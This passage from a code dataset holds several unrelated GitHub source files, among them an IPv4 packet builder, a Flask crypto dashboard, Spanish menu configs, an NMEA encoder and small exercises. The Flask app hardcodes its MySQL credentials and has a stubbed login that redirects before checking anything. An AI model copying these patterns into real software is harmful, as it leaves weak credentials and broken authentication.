\\\n Const, Struct, BitStruct, \\\n Flag, Nibble, Int8ub, Int16ub, BitsInteger, \\\n Bytes, GreedyBytes\n\nfrom utils import ones_complement_checksum\n\n\n_TYPICAL_MTU = 1500\n\n\nclass Packet:\n _HEADER = Struct(\n BitStruct(\n \"version\" / Const(4, Nibble),\n \"IHL\" / Const(5, Nibble) # Options are not supported so size is fixed\n ),\n \"TOS\" / Const(0, Int8ub), # Type of Service\n \"total_length\" / Int16ub,\n \"identification\" / Int16ub,\n BitStruct( # NOTE: Fragmentation not supported\n Const(False, Flag), # NOTE: Reserved by the protocol\n \"DF\" / Const(True, Flag),\n \"MF\" / Const(False, Flag),\n \"fragment_offset\" / Const(0, BitsInteger(13)),\n ),\n \"TTL\" / Int8ub,\n \"protocol\" / Int8ub,\n \"checksum\" / Int16ub,\n \"source_address\" / Bytes(4),\n \"destination_address\" / Bytes(4),\n # NOTE: header options are not supported, but they should come here\n )\n\n _STRUCT = Struct(\n \"header\" / _HEADER,\n \"data\" / GreedyBytes\n )\n\n def __init__(self, source_address, dest_address, identification=0, ttl=64, protocol=0, data=b\"\"):\n self._source_address = IPv4Address(source_address)\n self._dest_address = IPv4Address(dest_address)\n self._identification = identification\n self._ttl = ttl\n self._protocol = protocol\n self._header_checksum = 0\n self._data = data\n\n if len(self.build()) > _TYPICAL_MTU:\n raise ValueError(\"Packet size exceeds typical IPv4 MTU, fragmentation not supported\")\n\n 
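# build() serializes the packet twice: once with zeroed fields to measure\n # total_length, then again after filling in total_length and the ones'\n # complement header checksum (computed by ones_complement_checksum).\n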
def build(self) -> bytes:\n packet = {\n \"header\": {\n \"total_length\": 0,\n \"identification\": self._identification,\n \"TTL\": self._ttl,\n \"protocol\": self._protocol,\n \"checksum\": 0,\n \"source_address\": self._source_address.packed,\n \"destination_address\": self._dest_address.packed,\n },\n \"data\": self._data\n }\n\n total_length = len(self._STRUCT.build(packet))\n packet[\"header\"][\"total_length\"] = total_length\n packet[\"header\"][\"checksum\"] = ones_complement_checksum(\n self._HEADER.build(packet[\"header\"])\n )\n\n return self._STRUCT.build(packet)\n","repo_name":"segalmatan/pcap_creator","sub_path":"src/ipv4.py","file_name":"ipv4.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29883435197","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pprint\n\nfrom librerias.datos.base import globales\n\n########\n# PQRS #\n########\nradicado_web_juridico = {\n \"definicion\": {\n \"id\" : \"35\",\n \"nombre\": \"RADICACIóN - Radicación Persona JURIDICA\"\n },\n\n \"grid\": {\n \"componente\": \"radicado_general_grid\", \n \"texto\" : \"Radicación Persona JURIDICA\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Formularios web\",\n },\n\n \"forma\": {\n \"componente\": \"radicado_juridica_forma\", \n \"texto\" : \"Entradas radicados Ventanilla\",\n \"tipo\" : \"importar\"\n }\n}\n\nradicado_web_natural = {\n \"definicion\": {\n \"id\" : \"36\",\n \"nombre\": \"RADICACIóN - Radicación Persona Natural\"\n },\n\n \"grid\": {\n \"componente\": \"natural_radicados_grid\", \n \"texto\" : \"Radicación Persona Natural\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Formularios web\",\n },\n\n \"forma\": {\n \"componente\": \"natural_web_forma\", \n \"texto\" : \"Entradas radicados Web\",\n \"tipo\" : \"importar\"\n }\n}\n\nradicado_web_anonimo = {\n \"definicion\": {\n \"id\" : \"37\",\n \"nombre\": \"RADICACIóN - Radicación Anonimo\"\n },\n\n \"grid\": {\n \"componente\": \"anonimo_radicados_grid\", \n \"texto\" : \"Radicación Anonimo\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Formularios web\",\n },\n\n \"forma\": {\n \"componente\": \"anonimo_web_forma\", \n \"texto\" : \"Entradas radicados Web\",\n \"tipo\" : \"importar\"\n }\n}\n\nasignar_pqrs = {\n \"definicion\": {\n \"id\" : \"38\",\n \"nombre\": \"RADICACIóN - Asignación y traslado de radicados PQRS\"\n },\n\n \"grid\": {\n \"componente\": \"grid_pqrs_asigna_grid\", \n \"texto\" : \"Asignación y traslado de radicados PQRS\",\n \"icon\" : \"\", \n \"navegar\" : \"si\",\n \"padre\" : \"PQRSDF\",\n \"tipo\" : \"importar\",\n }, \n\n \"forma\": {\n \"componente\": \"forma_pqrs_asigna\", \n \"texto\" : \"Asignación y traslado de PQRS\",\n \"tipo\" : \"importar\"\n }\n}\n\npqrs_radicado = {\n \"definicion\": {\n \"id\" : \"39\",\n \"nombre\": \"RADICACIóN - Radicación PQRS\"\n },\n\n \"grid\": {\n \"componente\": \"grid_radica_asigna_grid\", \n \"texto\" : \"Radicación\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"PQRSDF\",\n },\n\n \"forma\": {\n \"componente\": \"pqrs_radicado_forma\", \n \"texto\" : \"Radicación PQRSDF\",\n \"tipo\" : \"importar\"\n },\n\n \"adicionales\": [\n {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n }\n ]\n}\n\n#######################\n# VENTANILLA 
RADICADO #\n#######################\n\nasignar_ventanilla = {\n \"definicion\": {\n \"id\" : \"411\",\n \"nombre\": \"RADICACIóN - Asignación y traslado de radicados VENTANILLA\"\n },\n\n \"grid\": {\n \"componente\": \"grid_ventanilla_asigna_grid\", \n \"texto\" : \"Asignación y traslado de radicados\",\n \"icon\" : \"\", \n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\",\n }, \n\n \"forma\": {\n \"componente\": \"forma_ventanilla_asigna\", \n \"texto\" : \"Asignación y traslado\",\n \"tipo\" : \"importar\"\n }\n}\n\n\nventanilla_radicado = {\n \"definicion\": {\n \"id\" : \"41\",\n \"nombre\": \"RADICACIóN - Radicación\"\n },\n\n \"grid\": {\n \"componente\": \"ventanilla_radicado_grid\", \n \"texto\" : \"Radicación\",\n \"icon\" : \"\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\"\n },\n\n \"forma\": {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n },\n\n \"adicionales\": [\n {\n \"componente\": \"ventanilla_radicado_forma\", \n \"texto\" : \"Radica entradas\",\n \"tipo\" : \"importar\"\n }\n ]\n\n}\n\nventanilla_radicado_consulta = {\n \"definicion\": {\n \"id\" : \"411\",\n \"nombre\": \"RADICACIóN - Consulta Radicados\"\n },\n\n \"forma\": {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n }\n}\n\nventanilla_radicado_gestion = {\n \"definicion\": {\n \"id\" : \"4111\",\n \"nombre\": \"RADICACIóN - Consulta (Entrada, Salida, Interno)\"\n },\n\n \"grid\": {\n \"componente\": \"grid_gestion_consulta_entidad\", \n \"texto\" : \"Radicada consulta TODOS\",\n \"icon\" : \"\", \n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\",\n },\n\n \"forma\": {\n \"componente\": \"forma_salida_consulta\", \n \"texto\" : \"Gestión consulta salidas\",\n \"tipo\" : \"importar\",\n },\n\n \"adicionales\": [\n {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados Entrada\",\n \"tipo\" : \"importar\"\n },\n\n {\n \"componente\": \"forma_interno_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n }\n ]\n}\n\n\n#####################\n# VENTANILLA SALIDA #\n#####################\nventanilla_salida = {\n \"definicion\": {\n \"id\" : \"42\",\n \"nombre\": \"CONSULTA - Salidas\"\n },\n\n \"grid\": {\n \"componente\": \"grid_ventanilla_salida\", \n \"texto\" : \"Salidas\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Salidas\",\n },\n\n \"forma\": {\n \"componente\": \"forma_salida_consulta\", \n \"texto\" : \"Consulta Salida\",\n \"tipo\" : \"importar\"\n }\n}\n\n######################\n# VENTANILLA INTERNO #\n######################\nventanilla_interno = {\n \"definicion\": {\n \"id\" : \"543\",\n \"nombre\": \"RADICACIóN - Radicación Interno\"\n },\n\n \"grid\": {\n \"componente\": \"ventanilla_interno_grid\", \n \"texto\" : \"Radicación Interno\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n },\n\n \"forma\": {\n \"componente\": \"ventanilla_interno_forma\", \n \"texto\" : \"Radicación Ventanilla Interno\",\n \"tipo\" : \"importar\"\n }\n}\n\nventanilla_interno_consulta = {\n \"definicion\": {\n \"id\" : \"5543\",\n \"nombre\": \"RADICACIóN - Consulta Radicados Interno\"\n },\n\n \"forma\": {\n \"componente\": \"ventanilla_interno_consulta\", \n \"texto\" : 
\"Consulta Radicados Interno\",\n \"tipo\" : \"importar\"\n }\n}\n\n################\n# CONSULTA WEB #\n################\nconsulta_radicados_web = {\n \"definicion\": {\n \"id\" : \"100\",\n \"nombre\": \"WEB - CONSULTA ESTADO RADICADO\"\n },\n\n \"grid\": {\n \"componente\": \"ventanilla_interno_grid\", \n \"texto\" : \"Radicación Interno\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicaci��n\",\n },\n}\n\n################\n# RADICA CORREO #\n################\ncorreos_grid = {\n \"definicion\": {\n \"id\" : \"110\",\n \"nombre\": \"RADICACIóN - CORREOS POR RADICAR\"\n },\n\n \"grid\": {\n \"componente\": \"correos_grid\", \n \"texto\" : \"Radicación de Correos\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\",\n },\n\n \"forma\": {\n \"componente\": \"ventanilla_radicado_forma\", \n \"texto\" : \"Radicación Ventanilla\",\n \"tipo\" : \"importar\"\n }\n}\n\n\nopciones = [\n radicado_web_juridico,\n\n radicado_web_natural,\n\n radicado_web_anonimo,\n\n asignar_pqrs,\n pqrs_radicado,\n\n asignar_ventanilla,\n ventanilla_radicado,\n ventanilla_radicado_consulta,\n ventanilla_radicado_gestion,\n\n #ventanilla_salida,\n #ventanilla_interno,\n\n ventanilla_interno_consulta,\n\n consulta_radicados_web,\n\n correos_grid\n]","repo_name":"quirogaco/active_document","sub_path":"aplicacion/servicios/opciones_radicacion.py","file_name":"opciones_radicacion.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39226332517","text":"from flask import Flask, flash, redirect, render_template, request, session, url_for, g\nfrom flask_session import Session\nfrom passlib.apps import custom_app_context as pwd_context\nfrom tempfile import gettempdir\nfrom helpers import *\nimport pprint # to show full html requests\n# import sqlite3 # to control transactions/rollbacks #### Deprecated, switching to MySQL ####\n#from flask_mysqldb import MySQL\nimport MySQLdb\nimport datetime # for database timestamps\nfrom cryptocompare_helpers import * # Helper functions for cryptocompare\nfrom rss_helpers import * # Helper functions for rss feeds\n###### Set up schedules ######\nimport time # Library for scheduling time based events\nimport atexit # Library for scheduling time based events\nfrom apscheduler.schedulers.background import BackgroundScheduler # Library for scheduling time based events\nfrom apscheduler.triggers.interval import IntervalTrigger # Library for scheduling time based events\nfrom app_schedules import *\n##############################\nimport logging\nlogging.basicConfig(filename='visitor.log',level=logging.WARNING) # Set to only record warnings since I don't want every request's info clogging up logs\n\nif __name__ == '__main__':\n main()\n\n# delete later #\n# configure application, instance_relative_config=True allows us to use instance folders for sensitive data\napp = Flask(__name__,instance_relative_config=True) \n#app.config.from_object('config') # Call original config file\napp.config.from_pyfile('config.py') # Call instance folder config file, this can overwrite the object variables if they are the same name\n\n# ensure responses aren't cached\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return 
# custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = gettempdir()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\n\n## OLD DB INFO ##\n# MySQL configurations\n# mysql = MySQL()\n# app.config['MYSQL_USER'] = 'blockroot'\n# app.config['MYSQL_PASSWORD'] = 'pass'\n# app.config['MYSQL_DB'] = 'Blockfund'\n# app.config['MYSQL_HOST'] = '127.0.0.1'\n# app.config['MYSQL_PORT'] = 3306\n# mysql.init_app(app)\nSession(app)\n\n# This creates a connection and tears it down after every request\n@app.teardown_appcontext\ndef close_db(error):\n # Closes the database again at the end of the request.\n if hasattr(g, 'mysql_db'):\n g.mysql_db.close()\n \ndef get_db():\n # Opens a new database connection if there is none yet for the current application context.\n if not hasattr(g, 'mysql_db'):\n g.mysql_db = MySQLdb.connect(host = '127.0.0.1', user = 'blockroot', passwd = 'pass', db = 'Blockfund', local_infile = 1)\n return g.mysql_db \n\n\n## Basic Routing Structure ##\n@app.route(\"/\")\n#@login_required\ndef index():\n log_msg = 'Index visited by IP: {}'.format(request.remote_addr)\n logging.warning(log_msg)\n print(log_msg)\n \n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n ip = request.remote_addr\n print(\"IP: {}\".format(ip))\n \n \n \n # loadDashboardChartsJson()\n cursor = get_db().cursor()\n # cursor.execute(\"Select * from btcusd_instantprices order by date desc limit 1;\")\n cursor.execute(\"SELECT (@row_number:=(@row_number + 1)%2) AS newsbucket, Title, CAST(Published AS DATE), URL FROM NewsFeed,(SELECT @row_number:=0) AS t limit 20;\") # divide news articles into two buckets, limit 10 articles for each widget\n news = list(cursor.fetchall())\n\n # btc_price = results[0][2]\n return render_template('index_nwelayout.html', \n # btcprice='{:,.2f}'.format(btc_price)\n news_articles = news \n )\n\n\n@app.route(\"/email\")\n#@login_required\ndef email():\n return render_template('email.html')\n\n\n@app.route(\"/icons.html\")\n@app.route(\"/icons\")\n#@login_required\ndef icons():\n return render_template('icons.html')\n\n\n@app.route(\"/apicall\")\n#@login_required\ndef api_call():\n client = Client(app.config[\"COINBASE_API_KEY\"], app.config[\"COINBASE_API_SECRET\"])\n # client._make_api_object(client._get('v2', 'prices', 'ETH-USD', 'historic'), APIObject)\n currency_code = 'ETH' \n \n #price = client.get_spot_price(currency=currency_code)\n price = client.get_spot_price(currency_pair= \"ETH-USD\")\n print(price)\n \n\n return render_template('index.html')\n\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n log_msg = 'Login visited by IP: {}'.format(request.remote_addr)\n logging.warning(log_msg)\n print(log_msg) \n \n\n \"\"\"Log user in.\"\"\"\n # forget any user_id\n session.clear()\n\n # if user reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n # NOTE: authentication is currently stubbed out and redirects straight\n # to the index; the validation below is unreachable until the\n # commented-out DB lookup is restored.\n return redirect(url_for(\"index\"))\n # ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\")\n\n # ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\")\n\n # # query database for username\n # db = MySQLdb.connect(host = '127.0.0.1', user = 'blockroot', passwd = 'pass', db = 'Blockfund', local_infile = 1)\n # # Check if 
connection was successful\n # if (!db):\n # print(\"Connection unsuccessful\")\n # return -1\n # else:\n # # Terminate\n # cursor = db.cursor()\n # cursor.execute(\"Select * from Blockfund.users where username = :username\")\n # results = list(cursor.fetchall()) \n # rows = db.execute(\"SELECT * FROM users WHERE username = :username\", username=request.form.get(\"username\"))\n\n # ensure username exists and password is correct\n if len(rows) != 1 or not pwd_context.verify(request.form.get(\"password\"), rows[0][\"hash\"]):\n return apology(\"invalid username and/or password\")\n \n # remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # redirect user to home page\n return redirect(url_for(\"index\"))\n\n # else if user reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n \n \n \n \n return render_template('login.html')\n\n\n\n\n@app.route(\"/markets\")\n#@login_required\ndef markets():\n cursor = get_db().cursor()\n cursor.execute(\"SET @row_number = 0;\")\n cursor.execute(\"SELECT (@row_number := @row_number +1) AS rownum, symbol, marketcap, price, volume24hr, supply, percentchange24hr, date FROM `marketcaps` WHERE volume24hr <> 0 ORDER BY marketcap DESC LIMIT 25;\")\n results = cursor.fetchall()\n # print(results)\n\n return render_template('markets.html', \n marketcaps=results) \n \n\n@app.route(\"/invest\", methods=[\"GET\", \"POST\"])\n#@login_required\ndef invest():\n test_list = [['Individual Trade', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12'],['Portfolio Total', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12']]\n test_txn_list = [['BTC', '5900.12', '5.223', '25000.12', '2017-12-20 20:45:31'], ['BTC', '11900.12', '1.223', '25000.12', '2017-12-24 20:45:31']]\n \n \n return render_template('invest_test.html', \n portfolio_list=test_list, \n txn_list=test_txn_list, \n cash=usd(9210.11), \n total_value=usd(1117.21)\n )\n \n \n@app.route(\"/invest_test\", methods=[\"GET\", \"POST\"])\n#@login_required\ndef invest_test():\n test_list = [['Individual Trade', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12'],['Portfolio Total', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12']]\n test_txn_list = [['BTC', '5900.12', '5.223', '25000.12', '2017-12-20 20:45:31'], ['BTC', '11900.12', '1.223', '25000.12', '2017-12-24 20:45:31']]\n \n \n return render_template('invest_test.html', \n portfolio_list=test_list, \n txn_list=test_txn_list, \n cash=usd(9210.11), \n total_value=usd(1117.21)\n ) \n \n\n@app.route(\"/education\", methods=[\"GET\"])\n#@login_required\ndef education():\n return render_template('education.html')\n\n\n\n@app.route(\"/charts\", methods=[\"GET\"])\n#@login_required\ndef charts():\n return render_template('charts.html')\n\n\n@app.route(\"/analyzer\", methods=[\"GET\"])\n#@login_required\ndef analyzer():\n cursor = get_db().cursor()\n cursor.execute(\"SELECT symbol from marketcaps;\")\n results = cursor.fetchall()\n typeahead_currency = [list(tupleresult)[0] for tupleresult in results] \n\n return render_template('analyzer2.html',\n currencynames_list = typeahead_currency\n )\n\n\n\n#***************************************************************************\n# SCHEDULED JOBS *\n#***************************************************************************\njob_defaults = {\n 'coalesce': False,\n 'max_instances': 
3\n}\nscheduler = BackgroundScheduler(job_defaults=job_defaults)\nscheduler.start()\n# scheduler.add_job( \n# func=lambda: syncInstantPrices(['BTC'], ['USD']), # Must use lambda to pass a function reference with parameters, otherwise the function fires on app start\n# trigger='cron',\n# year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"*\", second=\"*/30\");\n \nscheduler.add_job( \n func=lambda: syncMarkets(), # Must use lambda to pass a function reference with parameters, otherwise the function fires on app start\n trigger='cron',\n year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"32\", second=\"5\"); \n \nscheduler.add_job( \n func=lambda: syncNews(), # Update news articles shown\n trigger='cron',\n year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"15\", second=\"5\"); \n \n \n# Shut down the scheduler when exiting the app\natexit.register(lambda: scheduler.shutdown())\n\n# Example scheduler for timed tasks\n# scheduler = BackgroundScheduler()\n# scheduler.start()\n# scheduler.add_job(\n# func=print_date_time,\n# trigger=IntervalTrigger(minutes=1),\n# id='printing_job',\n# name='Print date and time every minute',\n# replace_existing=True)\n \n# scheduler.add_job( ## Works, was just testing it\n# # Can't figure out how to pass mysql\n# # need to figure out how to get the app reference object\n# # info here: http://flask-mysqldb.readthedocs.io/en/latest/\n# func=lambda: add_daily_price_to_db('BTC'), # Must use lambda to pass a function reference with parameters, otherwise the function fires on app start\n# trigger='cron',\n# year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"*\", second=\"*/5\");\n# # Shut down the scheduler when exiting the app\n# atexit.register(lambda: scheduler.shutdown())\n#############################\n# scheduler.add_job( ## Works, was just testing it\n# # Can't figure out how to pass mysql\n# # need to figure out how to get the app reference object\n# # info here: http://flask-mysqldb.readthedocs.io/en/latest/\n# func=lambda: syncDailyPrices(), # Must use lambda to pass a function reference with parameters, otherwise the function fires on app start\n# trigger='cron',\n# year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"*/5\");\n# # Shut down the scheduler when exiting the app\n# atexit.register(lambda: scheduler.shutdown())\n############################\n\n# Example of what logging looks like:\n # logging.basicConfig(filename='visitor.log',level=logging.DEBUG)\n # logging.debug('This message should go to the log file')\n # logging.info('So should this')\n # logging.warning('And this, too')\n# What will show up in the log file:\n # DEBUG:root:This message should go to the log file\n # INFO:root:So should this\n # WARNING:root:And this, too\n \n# Logging levels of severity are \n# CRITICAL\t50\n# ERROR\t 40\n# WARNING\t30\n# INFO\t 20\n# DEBUG\t 10\n# NOTSET\t0\n\n\n\n\n\n\n","repo_name":"S-King/BF","sub_path":"Application/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":12423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"4857544674","text":"# -*- coding: utf-8 -*-\n# @Time:2021/3/30 13:32\n# @Author:anonymity\n# @File:ReDemo.py\n# @Software:PyCharm\n\nimport re\n\npat = re.compile(\"AA\")\n\nm = pat.search(\"NBAAcdAA\")\nd = 
pat.findall(\"NBAAcdAA\")\n\nprint(d)","repo_name":"Anonymity-0/DoubanTop250","sub_path":"douban/Test/ReDemo.py","file_name":"ReDemo.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"19479814549","text":"f = open('./input.txt', 'r')\ndata = []\nfor x in f:\n data.append(int(x))\n\n# Exercise 1\nincreases = 0\nfor i in range(len(data)):\n if (data[i] > data[i - 1]):\n increases += 1\nprint(increases)\n\n# Exercise 2\nincreases = 0\nprevResult = float('inf')\nfor i in range(len(data)-2):\n result = data[i] + data[i+1] + data[i+2]\n if (result > prevResult):\n increases += 1\n prevResult = result\nprint(increases)","repo_name":"osmartti/aoc2021","sub_path":"python/day01/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"71172933356","text":"#!/usr/bin/env python\n__copyright__ = \"\"\"\n Copyright 2017 F4E | European Joint Undertaking for ITER and\n the Development of Fusion Energy ('Fusion for Energy').\n Licensed under the EUPL, Version 1.1 or - as soon they will be approved\n by the European Commission - subsequent versions of the EUPL (the \"Licence\")\n You may not use this work except in compliance with the Licence.\n You may obtain a copy of the Licence at: http://ec.europa.eu/idabc/eupl\n \n Unless required by applicable law or agreed to in writing, \n software distributed under the Licence is distributed on an \"AS IS\"\n basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n or implied. See the Licence permissions and limitations under the Licence.\n\"\"\"\n__license__ = \"EUPL\"\n__author__ = \"Andre' Neto\"\n__date__ = \"21/12/2017\"\n\n##\n# Standard imports\n##\nfrom flask import Response\nimport json\nimport logging\nimport time\nimport threading\n\n##\n# Project imports\n##\nfrom hconstants import HieratikaConstants\n\n##\n# Logger configuration\n##\nlog = logging.getLogger(\"{0}\".format(__name__))\n\n##\n# Class definition\n##\nclass WLoader(object):\n \"\"\" Provides an interface point between the specific loader implementations (see HieratikaLoader)\n and the webserver. 
In particular this class parses and transforms the web form parameters into \n the list of the parameters that are expected by the HieratikaLoader implementation.\n \"\"\"\n\n def __init__(self):\n \"\"\" NOOP\n \"\"\"\n self.loaderImpls = []\n\n def setLoaders(self, loaderImpls, baseDir):\n \"\"\" Sets the HieratikaLoader implementations to be used.\n \n Args:\n loaderImpls ([HieratikaLoader]): the list of HieratikaLoader implementations to be used.\n \"\"\"\n self.baseDir = baseDir\n self.loaderImpls = loaderImpls\n\n def loadIntoPlant(self, request):\n \"\"\" Parses the web parameters and loads (in order) the specified plants.\n\n Args:\n request.form[\"projectName\"]: the name of the project to be loaded.\n request.form[\"fileName\"]: the configuration file inside the project.\n request.form[\"userName\"]: the user that owns the project.\n Returns:\n HieratikaConstants.OK if all the configurations are successfully loaded.\n \"\"\"\n toReturn = \"InvalidParameters\"\n try:\n projectName = request.form[\"projectName\"]\n fileName = request.form[\"fileName\"]\n userName = request.form[\"userName\"]\n projectPath = \"{0}/Projects/{1}/{2}\".format(self.baseDir, userName, projectName)\n ok = \"\"\n for loader in self.loaderImpls:\n found = loader.isLoadable(projectPath)\n if (found):\n log.info(\"Loading into the plant the page with name {0}/{1}\".format(projectPath, fileName))\n ok = loader.loadIntoPlant(projectPath, fileName)\n if (ok != \"False\"):\n log.info(\"Loaded into the plant the project with path {0}\".format(projectPath))\n else:\n log.critical(\"Failed loading into the plant the project with path {0}\".format(projectPath))\n break\n # no loader accepted the project\n if (not found):\n log.critical(\"Could not find a loader for the project with path {0}\".format(projectPath))\n if (ok != \"False\"):\n toReturn = ok \n except KeyError as e:\n log.critical(e)\n return toReturn\n\n","repo_name":"gferro90/MARTe2Configurator","sub_path":"server/wloader.py","file_name":"wloader.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"}
{"seq_id":"21728961121","text":"from functools import reduce\n# Make APB, BWR and RMB\n\nVALID_NMEA_CHARS = [chr(x) for x in range(ord('A'), ord('Z') + 1)]  # 'A' through 'Z' inclusive\n\n\ndef nmea_name(name):\n    good_name = ''\n    for c in name.upper():\n        if c in VALID_NMEA_CHARS:\n            good_name += c\n        else:\n            good_name += '_'\n\n        if len(good_name) > 6:\n            break\n\n    return good_name\n\n\ndef encode_apb(dest):\n    \"\"\" https://gpsd.gitlab.io/gpsd/NMEA.html#_apb_autopilot_sentence_b \"\"\"\n    nmea = '$OPAPB,'\n    nmea += 'A,A,'  # 1,2 Set to valid\n    if dest.xte is None:\n        nmea += ',,,'  # 3,4,5 XTE is not valid\n    else:\n        dir_to_steer = 'R' if dest.xte > 0 else 'L'\n        nmea += '{:.3f},{},N,'.format(dest.xte, dir_to_steer)\n    nmea += 'A,' if dest.is_in_circle else 'V,'  # 6 Arrival Status, A = Arrival Circle Entered. V = not entered/passed\n    
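# Fields 13,14 below reuse the bearing from fields 11,12: without a wind or\n # current model, the heading to steer equals the bearing to the waypoint.\n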
nmea += 'V,' # 7 Not crossed\n if dest.bod is None:\n nmea += ',M,' # 8,9 Don't have origin to destination\n else:\n nmea += '{:.1f},M,'.format(dest.bod)\n nmea += nmea_name(dest.wpt.name) + ',' if dest.wpt is not None else ',' # 10 Waypoint name\n nmea += '{:.1f},M,'.format(dest.btw) if dest.btw is not None else ',M,' # 11,12\n nmea += '{:.1f},M'.format(dest.btw) if dest.btw is not None else ',M' # 13,14 Keep the same as 11,12\n nmea = append_checksum(nmea)\n nmea += '\\r\\n'\n\n return nmea\n\n\ndef encode_bwr(instr, dest):\n \"\"\" https://gpsd.gitlab.io/gpsd/NMEA.html#_bwr_bearing_and_distance_to_waypoint_rhumb_line \"\"\"\n nmea = '$OPBWR,'\n nmea += '{:02d}{:02d}{:02d},'.format(instr.utc.hour, instr.utc.minute, instr.utc.second) # 1 UTC\n nmea += encode_coord(dest.wpt.latitude, ['N', 'S']) # 2,3 Waypoint Latitude\n nmea += encode_coord(dest.wpt.longitude, ['E', 'W']) # 4,5 Waypoint Longitude\n nmea += ',T,' # 6,7 Bearing, degrees True (not provided)\n nmea += '{:.1f},M,'.format(dest.btw) if dest.btw is not None else ',M,' # 8,9 Bearing, degrees Magnetic\n nmea += '{:.3f},N,'.format(dest.dtw) if dest.dtw is not None else ',N,' # 10,11 Distance, Nautical Miles\n nmea += '{},'.format(nmea_name(dest.wpt.name)) # 12 Waypoint ID\n nmea += '' # 13 FAA mode indicator (NMEA 2.3 and later, optional)\n nmea = append_checksum(nmea)\n nmea += '\\r\\n'\n\n return nmea\n\n\ndef encode_rmb(dest):\n \"\"\" https://gpsd.gitlab.io/gpsd/NMEA.html#_rmb_recommended_minimum_navigation_information \"\"\"\n\n nmea = '$OPRMB,'\n nmea += 'A,' # 1 Status, A = Active, V = Invalid\n if dest.xte is None:\n nmea += ',,' # 2,3 XTE is not valid\n else:\n dir_to_steer = 'R' if dest.xte > 0 else 'L'\n nmea += '{:.3f},{},'.format(dest.xte, dir_to_steer) # 2,3\n nmea += '{},'.format(nmea_name(dest.org_wpt.name)) if dest.org_wpt is not None else \",\" # 4 Origin Waypoint ID\n nmea += '{},'.format(nmea_name(dest.wpt.name)) # 5 Destination Waypoint ID\n nmea += encode_coord(dest.wpt.latitude, ['N', 'S']) # 6,7 Destination Waypoint Latitude\n nmea += encode_coord(dest.wpt.longitude, ['E', 'W']) # 8,9 Destination Waypoint Longitude\n nmea += '{:.3f},'.format(dest.dtw) if dest.dtw is not None else ',' # 10 Range to destination in nautical miles\n nmea += '{:.1f},'.format(dest.btw_true) if 